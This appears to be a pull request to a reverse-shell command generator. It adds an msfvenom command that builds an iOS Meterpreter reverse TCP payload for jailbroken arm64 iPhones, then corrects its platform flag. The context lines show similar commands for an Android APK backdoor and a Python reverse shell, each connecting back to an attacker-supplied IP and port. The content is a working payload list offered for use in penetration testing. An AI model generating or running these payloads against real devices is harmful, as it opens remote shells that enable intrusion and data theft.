### PR TITLE
Adding Apple iOS Meterpreter payload

### DIFF
--- a/js/data.js
+++ b/js/data.js
@@ -453,6 +453,11 @@ const msfvenomCommands =  withCommandType(
             "command": "msfvenom --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk",
             "meta": ["msfvenom", "android", "android", "reverse"]
         },
+	{
+            "name": "Apple iOS Meterpreter Reverse TCP Inline",
+            "command": "msfvenom -p apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost={ip} lport={port} -f macho -o payload",
+            "meta": ["msfvenom", "apple_ios", "apple_ios", "reverse"]
+        },
         {
             "name": "Python Stageless Reverse TCP",
             "command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw",

--- a/js/data.js
+++ b/js/data.js
@@ -455,7 +455,7 @@ const msfvenomCommands =  withCommandType(
         },
 	{
             "name": "Apple iOS Meterpreter Reverse TCP Inline",
-            "command": "msfvenom -p apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost={ip} lport={port} -f macho -o payload",
+            "command": "msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost={ip} lport={port} -f macho -o payload",
             "meta": ["msfvenom", "apple_ios", "apple_ios", "reverse"]
         },
         {


### PR DESCRIPTION
A simple reverse TCP Inline payload that can be run on a jailbroken arm64 iPhone (5S+)